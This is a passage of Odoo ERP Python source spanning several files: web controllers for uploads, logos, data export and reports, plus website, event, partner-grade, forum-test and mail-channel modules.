'datas': base64.encodestring(ufile.read()),
'datas_fname': filename,
'res_model': model,
'res_id': int(id)
})
attachment._post_add_create()
except Exception:
args.append({'error': _("Something horrible happened")})
_logger.exception("Fail to upload attachment %s" % ufile.filename)
else:
args.append({
'filename': filename,
'mimetype': ufile.content_type,
'id': attachment.id
})
return out % (json.dumps(callback), json.dumps(args))
@http.route([
'/web/binary/company_logo',
'/logo',
'/logo.png',
], type='http', auth="none", cors="*")
def company_logo(self, dbname=None, **kw):
imgname = 'logo'
imgext = '.png'
placeholder = functools.partial(get_resource_path, 'web', 'static', 'src', 'img')
uid = None
if request.session.db:
dbname = request.session.db
uid = request.session.uid
elif dbname is None:
dbname = db_monodb()
if not uid:
uid = odoo.SUPERUSER_ID
if not dbname:
response = http.send_file(placeholder(imgname + imgext))
else:
try:
# create an empty registry
registry = odoo.modules.registry.Registry(dbname)
with registry.cursor() as cr:
company = int(kw['company']) if kw and kw.get('company') else False
if company:
cr.execute("""SELECT logo_web, write_date
FROM res_company
WHERE id = %s
""", (company,))
else:
cr.execute("""SELECT c.logo_web, c.write_date
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_base64 = base64.b64decode(row[0])
image_data = io.BytesIO(image_base64)
mimetype = guess_mimetype(image_base64, default='image/png')
imgext = '.' + mimetype.split('/')[1]
if imgext == '.svg+xml':
imgext = '.svg'
response = http.send_file(image_data, filename=imgname + imgext, mimetype=mimetype, mtime=row[1])
else:
response = http.send_file(placeholder('nologo.png'))
except Exception:
response = http.send_file(placeholder(imgname + imgext))
return response
class Action(http.Controller):
@http.route('/web/action/load', type='json', auth="user")
def load(self, action_id, additional_context=None):
Actions = request.env['ir.actions.actions']
value = False
try:
action_id = int(action_id)
except ValueError:
try:
action = request.env.ref(action_id)
assert action._name.startswith('ir.actions.')
action_id = action.id
except Exception:
action_id = 0 # force failed read
base_action = Actions.browse([action_id]).read(['type'])
if base_action:
ctx = dict(request.context)
action_type = base_action[0]['type']
if action_type == 'ir.actions.report':
ctx.update({'bin_size': True})
if additional_context:
ctx.update(additional_context)
request.context = ctx
action = request.env[action_type].browse([action_id]).read()
if action:
value = clean_action(action[0])
return value
@http.route('/web/action/run', type='json', auth="user")
def run(self, action_id):
result = request.env['ir.actions.server'].browse([action_id]).run()
return clean_action(result) if result else False
class Export(http.Controller):
@http.route('/web/export/formats', type='json', auth="user")
def formats(self):
""" Returns all valid export formats
:returns: for each export format, a pair of identifier and printable name
:rtype: [(str, str)]
"""
return [
{'tag': 'xls', 'label': 'Excel', 'error': None if xlwt else "XLWT 1.3.0 required"},
{'tag': 'csv', 'label': 'CSV'},
]
def fields_get(self, model):
Model = request.env[model]
fields = Model.fields_get()
return fields
@http.route('/web/export/get_fields', type='json', auth="user")
def get_fields(self, model, prefix='', parent_name= '',
import_compat=True, parent_field_type=None,
parent_field=None, exclude=None):
if import_compat and parent_field_type in ['many2one', 'many2many']:
fields = self.fields_get(model)
fields = {k: v for k, v in fields.items() if k in ['id', 'name']}
else:
fields = self.fields_get(model)
if not import_compat:
fields['.id'] = fields.pop('id', {'string': 'ID'})
else:
fields['id']['string'] = _('External ID')
if parent_field:
parent_field['string'] = _('External ID')
fields['id'] = parent_field
fields_sequence = sorted(fields.items(),
key=lambda field: (field[0] not in ['id', '.id', 'display_name', 'name'], odoo.tools.ustr(field[1].get('string', ''))))
records = []
for field_name, field in fields_sequence:
if import_compat and not field_name == 'id':
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
id = prefix + (prefix and '/'or '') + field_name
if field_name == 'name' and import_compat and parent_field_type in ['many2one', 'many2many']:
# Add name field when expand m2o and m2m fields in import-compatible mode
id = prefix
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(id.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name, 'parent_field': field}
record['children'] = True
return records
@http.route('/web/export/namelist', type='json', auth="user")
def namelist(self, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = request.env['ir.exports'].browse([export_id]).read()[0]
export_fields_list = request.env['ir.exports.line'].browse(export['export_fields']).read()
fields_data = self.fields_info(
model, [f['name'] for f in export_fields_list])
return [
{'name': field['name'], 'label': fields_data[field['name']]}
for field in export_fields_list
]
def fields_info(self, model, export_fields):
info = {}
fields = self.fields_get(model)
if ".id" in export_fields:
fields['.id'] = fields.get('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
# * then, group on: the first field of the path (which is the same for
# a field and for its subfields and the length of splitting on the
# first '/', which basically means grouping the field on one side and
# all of the subfields on the other. This way, we have the field (for
# the xmlid) with length 1, and all of the subfields with the same
# base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(model, export_fields).items())
class ExportFormat(object):
raw_data = False
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
provided base name (exension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from Odoo's export data to whatever the
current export class outputs
:params list fields: a list of fields to export
:params list rows: a list of records to export
:returns:
:rtype: bytes
"""
raise NotImplementedError()
def base(self, data, token):
params = json.loads(data)
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain', 'import_compat')(params)
Model = request.env[model].with_context(import_compat=import_compat, **params.get('context', {}))
records = Model.browse(ids) or Model.search(domain, offset=0, limit=False, order=False)
if not Model._is_an_ordinary_table():
fields = [field for field in fields if field['name'] != 'id']
field_names = [f['name'] for f in fields]
import_data = records.export_data(field_names, self.raw_data).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return request.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model))),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
@http.route('/web/export/csv', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = io.BytesIO()
writer = pycompat.csv_writer(fp, quoting=1)
writer.writerow(fields)
for data in rows:
row = []
for d in data:
# Spreadsheet apps tend to detect formulas on leading =, + and -
if isinstance(d, pycompat.string_types) and d.startswith(('=', '-', '+')):
d = "'" + d
row.append(pycompat.to_text(d))
writer.writerow(row)
return fp.getvalue()
class ExcelExport(ExportFormat, http.Controller):
# Excel needs raw data to correctly handle numbers and date values
raw_data = True
@http.route('/web/export/xls', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
if len(rows) > 65535:
raise UserError(_('There are too many rows (%s rows, limit: 65535) to export as Excel 97-2003 (.xls) format. Consider splitting the export.') % len(rows))
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
base_style = xlwt.easyxf('align: wrap yes')
date_style = xlwt.easyxf('align: wrap yes', num_format_str='YYYY-MM-DD')
datetime_style = xlwt.easyxf('align: wrap yes', num_format_str='YYYY-MM-DD HH:mm:SS')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
cell_style = base_style
if isinstance(cell_value, bytes) and not isinstance(cell_value, pycompat.string_types):
# because xls uses raw export, we can get a bytes object
# here. xlwt does not support bytes values in Python 3 ->
# assume this is base64 and decode to a string, if this
# fails note that you can't export
try:
cell_value = pycompat.to_text(cell_value)
except UnicodeDecodeError:
raise UserError(_("Binary fields can not be exported to Excel unless their content is base64-encoded. That does not seem to be the case for %s.") % fields[cell_index])
if isinstance(cell_value, pycompat.string_types):
cell_value = re.sub("\r", " ", pycompat.to_text(cell_value))
# Excel supports a maximum of 32767 characters in each cell:
cell_value = cell_value[:32767]
elif isinstance(cell_value, datetime.datetime):
cell_style = datetime_style
elif isinstance(cell_value, datetime.date):
cell_style = date_style
worksheet.write(row_index + 1, cell_index, cell_value, cell_style)
fp = io.BytesIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
class Apps(http.Controller):
@http.route('/apps/<app>', auth='user')
def get_app_url(self, req, app):
try:
record = request.env.ref('base.open_module_tree')
action = record.read(['name', 'type', 'res_model', 'view_mode', 'view_type', 'context', 'views', 'domain'])[0]
action['target'] = 'current'
except ValueError:
action = False
try:
app_id = request.env.ref('base.module_%s' % app).id
except ValueError:
app_id = False
if action and app_id:
action['res_id'] = app_id
action['view_mode'] = 'form'
action['views'] = [(False, u'form')]
sakey = Session().save_session_action(action)
debug = '?debug' if req.debug else ''
return werkzeug.utils.redirect('/web{0}#sa={1}'.format(debug, sakey))
class ReportController(http.Controller):
#------------------------------------------------------
# Report controllers
#------------------------------------------------------
@http.route([
'/report/<converter>/<reportname>',
'/report/<converter>/<reportname>/<docids>',
], type='http', auth='user', website=True)
def report_routes(self, reportname, docids=None, converter=None, **data):
report = request.env['ir.actions.report']._get_report_from_name(reportname)
context = dict(request.env.context)
if docids:
docids = [int(i) for i in docids.split(',')]
if data.get('options'):
data.update(json.loads(data.pop('options')))
if data.get('context'):
# Ignore 'lang' here, because the context in data is the one from the webclient *but* if
# the user explicitely wants to change the lang, this mechanism overwrites it.
data['context'] = json.loads(data['context'])
if data['context'].get('lang'):
del data['context']['lang']
context.update(data['context'])
if converter == 'html':
html = report.with_context(context).render_qweb_html(docids, data=data)[0]
return request.make_response(html)
elif converter == 'pdf':
pdf = report.with_context(context).render_qweb_pdf(docids, data=data)[0]
pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', len(pdf))]
return request.make_response(pdf, headers=pdfhttpheaders)
elif converter == 'text':
text = report.with_context(context).render_qweb_text(docids, data=data)[0]
texthttpheaders = [('Content-Type', 'text/plain'), ('Content-Length', len(text))]
return request.make_response(text, headers=texthttpheaders)
else:
raise werkzeug.exceptions.HTTPException(description='Converter %s not implemented.' % converter)
#------------------------------------------------------
# Misc. route utils
#------------------------------------------------------
@http.route(['/report/barcode', '/report/barcode/<type>/<path:value>'], type='http', auth="public")
def report_barcode(self, type, value, width=600, height=100, humanreadable=0):
"""Contoller able to render barcode images thanks to reportlab.
Samples:
<img t-att-src="'/report/barcode/QR/%s' % o.name"/>
<img t-att-src="'/report/barcode/?type=%s&value=%s&width=%s&height=%s' %
('QR', o.name, 200, 200)"/>
:param type: Accepted types: 'Codabar', 'Code11', 'Code128', 'EAN13', 'EAN8', 'Extended39',
'Extended93', 'FIM', 'I2of5', 'MSI', 'POSTNET', 'QR', 'Standard39', 'Standard93',
'UPCA', 'USPS_4State'
:param humanreadable: Accepted values: 0 (default) or 1. 1 will insert the readable value
at the bottom of the output image
"""
try:
barcode = request.env['ir.actions.report'].barcode(type, value, width=width, height=height, humanreadable=humanreadable)
except (ValueError, AttributeError):
raise werkzeug.exceptions.HTTPException(description='Cannot convert into barcode.')
return request.make_response(barcode, headers=[('Content-Type', 'image/png')])
@http.route(['/report/download'], type='http', auth="user")
def report_download(self, data, token):
"""This function is used by 'action_manager_report.js' in order to trigger the download of
a pdf/controller report.
:param data: a javascript array JSON.stringified containg report internal url ([0]) and
type [1]
:returns: Response with a filetoken cookie and an attachment header
"""
requestcontent = json.loads(data)
url, type = requestcontent[0], requestcontent[1]
try:
if type in ['qweb-pdf', 'qweb-text']:
converter = 'pdf' if type == 'qweb-pdf' else 'text'
extension = 'pdf' if type == 'qweb-pdf' else 'txt'
pattern = '/report/pdf/' if type == 'qweb-pdf' else '/report/text/'
reportname = url.split(pattern)[1].split('?')[0]
docids = None
if '/' in reportname:
reportname, docids = reportname.split('/')
if docids:
# Generic report:
response = self.report_routes(reportname, docids=docids, converter=converter)
else:
# Particular report:
data = url_decode(url.split('?')[1]).items() # decoding the args represented in JSON
response = self.report_routes(reportname, converter=converter, **dict(data))
report = request.env['ir.actions.report']._get_report_from_name(reportname)
filename = "%s.%s" % (report.name, extension)
if docids:
ids = [int(x) for x in docids.split(",")]
obj = request.env[report.model].browse(ids)
if report.print_report_name and not len(obj) > 1:
report_name = safe_eval(report.print_report_name, {'object': obj, 'time': time})
filename = "%s.%s" % (report_name, extension)
response.headers.add('Content-Disposition', content_disposition(filename))
response.set_cookie('fileToken', token)
return response
else:
return
except Exception as e:
se = _serialize_exception(e)
error = {
'code': 200,
'message': "Odoo Server Error",
'data': se
}
return request.make_response(html_escape(json.dumps(error)))
@http.route(['/report/check_wkhtmltopdf'], type='json', auth="user")
def check_wkhtmltopdf(self):
return request.env['ir.actions.report'].get_wkhtmltopdf_state()
```
#### File: website/controllers/web_editor.py
```python
from odoo.addons.web_editor.controllers.main import Web_Editor
from odoo.http import request
class Web_Editor(Web_Editor):
def _get_view_fields_to_read(self):
res = super(Web_Editor, self)._get_view_fields_to_read()
res.append('website_id')
return res
def save_scss_view_hook(self):
res = super(Web_Editor, self).save_scss_view_hook()
website = request.env['website'].get_current_website()
if website:
res['website_id'] = website.id
return res
def save_scss_attachment_hook(self):
res = super(Web_Editor, self).save_scss_attachment_hook()
website = request.env['website'].get_current_website()
if website:
res['website_id'] = website.id
return res
def get_custom_attachment(self, custom_url, op='='):
website = request.env['website'].get_current_website()
res = super(Web_Editor, self).get_custom_attachment(custom_url, op=op)
return res.with_context(website_id=website.id).filtered(lambda x: not x.website_id or x.website_id == website)
def get_custom_view(self, custom_url, op='='):
website = request.env['website'].get_current_website()
res = super(Web_Editor, self).get_custom_view(custom_url, op=op)
return res.with_context(website_id=website.id).filter_duplicate()
```
#### File: website_crm_partner_assign/models/res_partner.py
```python
from odoo import api, fields, models
from odoo.addons.http_routing.models.ir_http import slug
class ResPartnerGrade(models.Model):
_name = 'res.partner.grade'
_inherit = ['website.published.mixin']
_description = 'Partner Grade'
website_published = fields.Boolean(default=True)
sequence = fields.Integer('Sequence')
active = fields.Boolean('Active', default=lambda *args: 1)
name = fields.Char('Level Name', translate=True)
partner_weight = fields.Integer('Level Weight', default=1,
help="Gives the probability to assign a lead to this partner. (0 means no assignation.)")
@api.multi
def _compute_website_url(self):
super(ResPartnerGrade, self)._compute_website_url()
for grade in self:
grade.website_url = "/partners/grade/%s" % (slug(grade))
class ResPartnerActivation(models.Model):
_name = 'res.partner.activation'
_order = 'sequence'
_description = 'Partner Activation'
sequence = fields.Integer('Sequence')
name = fields.Char('Name', required=True)
class ResPartner(models.Model):
_inherit = "res.partner"
partner_weight = fields.Integer('Level Weight', default=0, track_visibility='onchange',
help="This should be a numerical value greater than 0 which will decide the contention for this partner to take this lead/opportunity.")
grade_id = fields.Many2one('res.partner.grade', 'Level', track_visibility='onchange')
grade_sequence = fields.Integer(related='grade_id.sequence', readonly=True, store=True)
activation = fields.Many2one('res.partner.activation', 'Activation', index=True, track_visibility='onchange')
date_partnership = fields.Date('Partnership Date')
date_review = fields.Date('Latest Partner Review')
date_review_next = fields.Date('Next Partner Review')
# customer implementation
assigned_partner_id = fields.Many2one(
'res.partner', 'Implemented by',
)
implemented_partner_ids = fields.One2many(
'res.partner', 'assigned_partner_id',
string='Implementation References',
)
implemented_count = fields.Integer(compute='_compute_implemented_partner_count', store=True)
@api.one
@api.depends('implemented_partner_ids', 'implemented_partner_ids.website_published', 'implemented_partner_ids.active')
def _compute_implemented_partner_count(self):
self.implemented_count = len(self.implemented_partner_ids.filtered('website_published'))
@api.onchange('grade_id')
def _onchange_grade_id(self):
grade = self.grade_id
self.partner_weight = grade.partner_weight if grade else 0
```
#### File: website_event/models/event.py
```python
import logging
import pytz
import werkzeug
from odoo import api, fields, models, _
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
try:
import vobject
except ImportError:
_logger.warning("`vobject` Python module not found, iCal file generation disabled. Consider installing this module if you want to generate iCal files")
vobject = None
GOOGLE_CALENDAR_URL = 'https://www.google.com/calendar/render?'
class EventType(models.Model):
_name = 'event.type'
_inherit = ['event.type']
website_menu = fields.Boolean(
'Display a dedicated menu on Website')
class Event(models.Model):
_name = 'event.event'
_inherit = ['event.event', 'website.seo.metadata', 'website.published.multi.mixin']
is_published = fields.Boolean(track_visibility='onchange')
is_participating = fields.Boolean("Is Participating", compute="_compute_is_participating")
website_menu = fields.Boolean('Dedicated Menu',
help="Creates menus Introduction, Location and Register on the page "
" of the event on the website.", copy=False)
menu_id = fields.Many2one('website.menu', 'Event Menu', copy=False)
def _compute_is_participating(self):
# we don't allow public user to see participating label
if self.env.user != self.env['website'].get_current_website().user_id:
email = self.env.user.partner_id.email
for event in self:
domain = ['&', '|', ('email', '=', email), ('partner_id', '=', self.env.user.partner_id.id), ('event_id', '=', event.id)]
event.is_participating = self.env['event.registration'].search_count(domain)
@api.multi
@api.depends('name')
def _compute_website_url(self):
super(Event, self)._compute_website_url()
for event in self:
if event.id: # avoid to perform a slug on a not yet saved record in case of an onchange.
event.website_url = '/event/%s' % slug(event)
@api.onchange('event_type_id')
def _onchange_type(self):
super(Event, self)._onchange_type()
if self.event_type_id:
self.website_menu = self.event_type_id.website_menu
def _get_menu_entries(self):
""" Method returning menu entries to display on the website view of the
event, possibly depending on some options in inheriting modules. """
self.ensure_one()
return [
(_('Introduction'), False, 'website_event.template_intro'),
(_('Location'), False, 'website_event.template_location'),
(_('Register'), '/event/%s/register' % slug(self), False),
]
def _toggle_create_website_menus(self, vals):
for event in self:
if 'website_menu' in vals:
if event.menu_id and not event.website_menu:
event.menu_id.unlink()
elif event.website_menu:
if not event.menu_id:
root_menu = self.env['website.menu'].create({'name': event.name, 'website_id': event.website_id.id})
event.menu_id = root_menu
for sequence, (name, url, xml_id) in enumerate(event._get_menu_entries()):
event._create_menu(sequence, name, url, xml_id)
@api.model
def create(self, vals):
res = super(Event, self).create(vals)
res._toggle_create_website_menus(vals)
return res
@api.multi
def write(self, vals):
res = super(Event, self).write(vals)
self._toggle_create_website_menus(vals)
return res
def _create_menu(self, sequence, name, url, xml_id):
if not url:
newpath = self.env['website'].new_page(name + ' ' + self.name, template=xml_id, ispage=False)['url']
url = "/event/" + slug(self) + "/page/" + newpath[1:]
menu = self.env['website.menu'].create({
'name': name,
'url': url,
'parent_id': self.menu_id.id,
'sequence': sequence,
'website_id': self.website_id.id,
})
return menu
@api.multi
def google_map_img(self, zoom=8, width=298, height=298):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_img(zoom=zoom, width=width, height=height)
return None
@api.multi
def google_map_link(self, zoom=8):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_link(zoom=zoom)
return None
@api.multi
def _track_subtype(self, init_values):
self.ensure_one()
if 'is_published' in init_values and self.is_published:
return 'website_event.mt_event_published'
elif 'is_published' in init_values and not self.is_published:
return 'website_event.mt_event_unpublished'
return super(Event, self)._track_subtype(init_values)
@api.multi
def action_open_badge_editor(self):
""" open the event badge editor : redirect to the report page of event badge report """
self.ensure_one()
return {
'type': 'ir.actions.act_url',
'target': 'new',
'url': '/report/html/%s/%s?enable_editor' % ('event.event_event_report_template_badge', self.id),
}
@api.multi
def _get_ics_file(self):
""" Returns iCalendar file for the event invitation.
:returns a dict of .ics file content for each event
"""
result = {}
if not vobject:
return result
for event in self:
cal = vobject.iCalendar()
cal_event = cal.add('vevent')
if not event.date_begin or not event.date_end:
raise UserError(_("No date has been specified for the event, no file will be generated."))
cal_event.add('created').value = fields.Datetime.now().replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('dtstart').value = fields.Datetime.from_string(event.date_begin).replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('dtend').value = fields.Datetime.from_string(event.date_end).replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('summary').value = event.name
if event.address_id:
cal_event.add('location').value = event.sudo().address_id.contact_address
result[event.id] = cal.serialize().encode('utf-8')
return result
def _get_event_resource_urls(self, attendees):
url_date_start = self.date_begin.strftime('%Y%m%dT%H%M%SZ')
url_date_stop = self.date_end.strftime('%Y%m%dT%H%M%SZ')
params = {
'action': 'TEMPLATE',
'text': self.name,
'dates': url_date_start + '/' + url_date_stop,
'details': self.name,
}
if self.address_id:
params.update(location=self.sudo().address_id.contact_address.replace('\n', ' '))
encoded_params = werkzeug.url_encode(params)
google_url = GOOGLE_CALENDAR_URL + encoded_params
iCal_url = '/event/%s/ics?%s' % (slug(self), encoded_params)
return {'google_url': google_url, 'iCal_url': iCal_url}
def _default_website_meta(self):
res = super(Event, self)._default_website_meta()
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.date_begin
res['default_twitter']['twitter:card'] = 'summary'
return res
```
#### File: website_forum/tests/test_forum_process.py
```python
import odoo.tests
@odoo.tests.common.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_admin_forum_tour(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('question')", "odoo.__DEBUG__.services['web_tour.tour'].tours.question.ready", login="admin")
def test_02_demo_question(self):
forum = self.env.ref('website_forum.forum_help')
demo = self.env.ref('base.user_demo')
demo.karma = forum.karma_post + 1
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('forum_question')", "odoo.__DEBUG__.services['web_tour.tour'].tours.forum_question.ready", login="demo")
```
#### File: website_mail_channel/models/mail_channel.py
```python
import hmac
from werkzeug import urls
from odoo import api, models
from odoo.tools.safe_eval import safe_eval
from odoo.addons.http_routing.models.ir_http import slug
class MailGroup(models.Model):
_inherit = 'mail.channel'
@api.multi
def _notify_specific_email_values(self, message):
res = super(MailGroup, self)._notify_specific_email_values(message)
try:
headers = safe_eval(res.get('headers', dict()))
except Exception:
headers = {}
base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')
headers['List-Archive'] = '<%s/groups/%s>' % (base_url, slug(self)),
headers['List-Subscribe'] = '<%s/groups>' % (base_url),
headers['List-Unsubscribe'] = '<%s/groups?unsubscribe>' % (base_url,),
res['headers'] = repr(headers)
return res
@api.multi
def _send_confirmation_email(self, partner_ids, unsubscribe=False):
base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')
route = "/groups/%(action)s/%(channel)s/%(partner)s/%(token)s"
if unsubscribe:
template = self.env.ref('website_mail_channel.mail_template_list_unsubscribe')
action = 'unsubscribe'
else:
template = self.env.ref('website_mail_channel.mail_template_list_subscribe')
action = 'subscribe'
for partner_id in partner_ids:
# generate a new token per subscriber
token = self._generate_action_token(partner_id, action=action)
token_url = urls.url_join(base_url, route % {
'action': action,
'channel': self.id,
'partner': partner_id,
'token': token,
})
template.with_context(token_url=token_url).send_mail(self.id,
force_send=True,
email_values={'recipient_ids': [(4, partner_id)]}
)
return True
@api.multi
def _generate_action_token(self, partner_id, action='unsubscribe'):
self.ensure_one()
secret = self.env['ir.config_parameter'].sudo().get_param('database.secret')
data = '$'.join([
str(self.id),
str(partner_id),
action])
return hmac.new(secret.encode('utf-8'), data.encode('utf-8')).hexdigest()
```
#### File: website/models/website.py
```python
import inspect
import logging
import hashlib
import re
from werkzeug import urls
from werkzeug.exceptions import NotFound
from odoo import api, fields, models, tools
from odoo.addons.http_routing.models.ir_http import slugify, _guess_mimetype
from odoo.addons.website.models.ir_http import sitemap_qs2dom
from odoo.addons.portal.controllers.portal import pager
from odoo.tools import pycompat
from odoo.http import request
from odoo.osv import expression
from odoo.osv.expression import FALSE_DOMAIN
from odoo.tools.translate import _
logger = logging.getLogger(__name__)
DEFAULT_CDN_FILTERS = [
"^/[^/]+/static/",
"^/web/(css|js)/",
"^/web/image",
"^/web/content",
# retrocompatibility
"^/website/image/",
]
class Website(models.Model):
_name = "website"
_description = "Website"
@api.model
def website_domain(self, website_id=False):
return [('website_id', 'in', (False, website_id or self.id))]
def _active_languages(self):
return self.env['res.lang'].search([]).ids
def _default_language(self):
lang_code = self.env['ir.default'].get('res.partner', 'lang')
def_lang = self.env['res.lang'].search([('code', '=', lang_code)], limit=1)
return def_lang.id if def_lang else self._active_languages()[0]
name = fields.Char('Website Name', required=True)
domain = fields.Char('Website Domain')
country_group_ids = fields.Many2many('res.country.group', 'website_country_group_rel', 'website_id', 'country_group_id',
string='Country Groups', help='Used when multiple websites have the same domain.')
company_id = fields.Many2one('res.company', string="Company", default=lambda self: self.env.ref('base.main_company').id, required=True)
language_ids = fields.Many2many('res.lang', 'website_lang_rel', 'website_id', 'lang_id', 'Languages', default=_active_languages)
default_lang_id = fields.Many2one('res.lang', string="Default Language", default=_default_language, required=True)
default_lang_code = fields.Char("Default language code", related='default_lang_id.code', store=True, readonly=False)
auto_redirect_lang = fields.Boolean('Autoredirect Language', default=True, help="Should users be redirected to their browser's language")
def _default_social_facebook(self):
return self.env.ref('base.main_company').social_facebook
def _default_social_github(self):
return self.env.ref('base.main_company').social_github
def _default_social_linkedin(self):
return self.env.ref('base.main_company').social_linkedin
def _default_social_youtube(self):
return self.env.ref('base.main_company').social_youtube
def _default_social_googleplus(self):
return self.env.ref('base.main_company').social_googleplus
def _default_social_instagram(self):
return self.env.ref('base.main_company').social_instagram
def _default_social_twitter(self):
return self.env.ref('base.main_company').social_twitter
social_twitter = fields.Char('Twitter Account', default=_default_social_twitter)
social_facebook = fields.Char('Facebook Account', default=_default_social_facebook)
social_github = fields.Char('GitHub Account', default=_default_social_github)
social_linkedin = fields.Char('LinkedIn Account', default=_default_social_linkedin)
social_youtube = fields.Char('Youtube Account', default=_default_social_youtube)
social_googleplus = fields.Char('Google+ Account', default=_default_social_googleplus)
social_instagram = fields.Char('Instagram Account', default=_default_social_instagram)
social_default_image = fields.Binary(string="Default Social Share Image", attachment=True, help="If set, replaces the company logo as the default social share image.")
google_analytics_key = fields.Char('Google Analytics Key')
google_management_client_id = fields.Char('Google Client ID')
google_management_client_secret = fields.Char('Google Client Secret')
google_maps_api_key = fields.Char('Google Maps API Key')
user_id = fields.Many2one('res.users', string='Public User', required=True)
cdn_activated = fields.Boolean('Content Delivery Network (CDN)')
cdn_url = fields.Char('CDN Base URL', default='')
cdn_filters = fields.Text('CDN Filters', default=lambda s: '\n'.join(DEFAULT_CDN_FILTERS), help="URL matching those filters will be rewritten using the CDN Base URL")
partner_id = fields.Many2one(related='user_id.partner_id', relation='res.partner', string='Public Partner', readonly=False)
menu_id = fields.Many2one('website.menu', compute='_compute_menu', string='Main Menu')
homepage_id = fields.Many2one('website.page', string='Homepage')
favicon = fields.Binary(string="Website Favicon", help="This field holds the image used to display a favicon on the website.")
theme_id = fields.Many2one('ir.module.module', help='Installed theme')
specific_user_account = fields.Boolean('Specific User Account', help='If True, new accounts will be associated to the current website')
auth_signup_uninvited = fields.Selection([
('b2b', 'On invitation'),
('b2c', 'Free sign up'),
], string='Customer Account', default='b2b')
@api.onchange('language_ids')
def _onchange_language_ids(self):
if self.language_ids and self.default_lang_id not in self.language_ids:
self.default_lang_id = self.language_ids[0]
@api.multi
def _compute_menu(self):
Menu = self.env['website.menu']
for website in self:
website.menu_id = Menu.search([('parent_id', '=', False), ('website_id', '=', website.id)], order='id', limit=1).id
@api.model
def create(self, vals):
if 'user_id' not in vals:
company = self.env['res.company'].browse(vals.get('company_id'))
vals['user_id'] = company._get_public_user().id if company else self.env.ref('base.public_user').id
res = super(Website, self).create(vals)
res._bootstrap_homepage()
if not self.env.user.has_group('website.group_multi_website') and self.search_count([]) > 1:
all_user_groups = 'base.group_portal,base.group_user,base.group_public'
groups = self.env['res.groups'].concat(*(self.env.ref(it) for it in all_user_groups.split(',')))
groups.write({'implied_ids': [(4, self.env.ref('website.group_multi_website').id)]})
return res
@api.multi
def write(self, values):
public_user_to_change_websites = self.env['website']
self._get_languages.clear_cache(self)
if 'company_id' in values and 'user_id' not in values:
public_user_to_change_websites = self.filtered(lambda w: w.sudo().user_id.company_id.id != values['company_id'])
if public_user_to_change_websites:
company = self.env['res.company'].browse(values['company_id'])
super(Website, public_user_to_change_websites).write(dict(values, user_id=company._get_public_user().id))
